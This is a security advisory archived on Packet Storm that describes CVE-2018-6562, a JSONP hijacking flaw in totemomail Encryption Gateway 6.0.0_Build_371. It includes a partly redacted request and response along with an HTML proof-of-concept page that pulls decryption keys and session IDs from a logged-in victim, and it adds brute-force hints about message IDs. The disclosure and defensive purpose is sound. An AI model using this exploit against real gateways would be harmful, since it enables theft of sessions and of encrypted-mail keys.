Twenty Year Anniversary

Totemomail Encryption Gateway 6.0.0_Build_371 JSONP Hijacking

Totemomail Encryption Gateway 6.0.0_Build_371 JSONP Hijacking
Posted May 15, 2018
Authored by Nicolas Heiniger

Totemomail Encryption Gateway version 6.0.0_Build_371 suffers from a JSONP hijacking vulnerability.

tags | exploit
advisories | CVE-2018-6562
MD5 | 6e6f06190a4a84cb2f21b0f6884348b4

Totemomail Encryption Gateway 6.0.0_Build_371 JSONP Hijacking

Change Mirror Download
################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product: totemomail Encryption Gateway
# Vendor: totemo AG
# CSNC ID: CSNC-2018-002
# CVE ID: CVE-2018-6562
# Subject: JSONP hijacking
# Risk: High
# Effect: Remotely exploitable
# Author: Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date: 14.05.2018
#
################################################################################

Introduction:
-------------
The totemomail Encryption Gateway protects email communication with any external
partner by encryption. It doesn't matter whether you exchange emails with
technically savvy communication partners or with those who have neither an
appropriate infrastructure nor the necessary know-how. The encryption gateway
also makes it easy to securely send very large attachments.[1]

Compass Security discovered a vulnerability in the process of decrypting
a secure message sent to an external partner. This issue could lead to the
user's session on the gateway being stolen. The encryption material for the
encrypted email could also be stolen in the same way.


Affected:
---------
Vulnerable:
* 6.0.0_Build_371

No other version was tested but is is likely that older versions are affected as
well.


Technical Description
---------------------
When sending an encrypted email to a recipient outside of the organization,
totemomail Encryption Gateway sends a so-called Envelope Message that includes
an HTML file with the encrypted content and JavaScript to get the key from the
gateway to decrypt the content. The key material is provided by the gateway
through a JSONP callback that must be either authenticated using the email and
password in the POST request or with an existing session ID. An example is
provided below:
==========
GET /responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey
&messageId=160_1&callback=jsonpCallback&usermail=[CUT BY COMPASS]
&password=[CUT BY COMPASS]&usermtan=&_=1515597892513 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=EF8E33D6DAD75F0394381AB7084DEA2D;
oam.Flash.RENDERMAP.TOKEN=uy9dqvc4a
Connection: close
==========

The response contains the key material as well as the session ID:
==========
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 206
Date: Wed, 10 Jan 2018 15:26:17 GMT

jsonpCallback({"iv": "AJD[CUT BY COMPASS]w==",
"key": "OYP[CUT BY COMPASS]w=", "cipher": "AES\/CBC\/PKCS5Padding",
"keyAlgo": "AES", "session": "EF8E33D6DAD75F0394381AB7084DEA2D"});
==========

The problem arises because the same request is accepted if a session already
exists on the Encryption Gateway. In this case, the username and password are
not required. This enables an attacker to create a malicious web page that will
define a JavaScript function 'jsonpCallback' and insert a script tag with the
source on the Encryption Gateway. This way, it is possible to retrieve the
response in the callback if a logged in user visits the malicious page.

An example of such a malicious page is given below, note that the user, password
and mtan parameters are not required:
==========
<html>
<head>
<title>JSONP data and session stealing PoC</title>
<script>
function jsonpCallback(obj) {
document.write('<p>Your data is:</p>');
document.write('<code>' + JSON.stringify(obj) + '</code>')
}
</script>
</head>
<body>
<h1>JSONP data and session stealing PoC</h1>
<script src="https://[CUT BY COMPASS]/responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey&messageId=160_1"></script>
</body>
</html>
==========

The only issue one can run into, is to guess the message ID but as far as Compass
was able to observe this is kept in a form XXX_YY where XXX is a 3-digits number
and YY is a 1 or 2-digits number. This allows for a brute force attack even over
the Internet.


Workaround / Fix:
-----------------
Install an up to date version of totemomail Encryption Gateway.

As a developer, JSONP callbacks should not include sensitive information. If
they need to, the request must include an unpredictable element. In this case a
possibility would be to require the email and the password of the user even if
the session is open.


Timeline:
---------
2018-05-14: Coordinated public disclosure date
2018-04-XX: Release of fixed version 6.0_b567
2018-02-13: Initial vendor response
2018-02-09: Initial vendor notification
2018-02-02: Assigned CVE-2018-6562
2018-01-10: Discovery by Nicolas Heiniger


References:
-----------
[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    7 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    40 Files
  • 23
    May 23rd
    64 Files
  • 24
    May 24th
    55 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close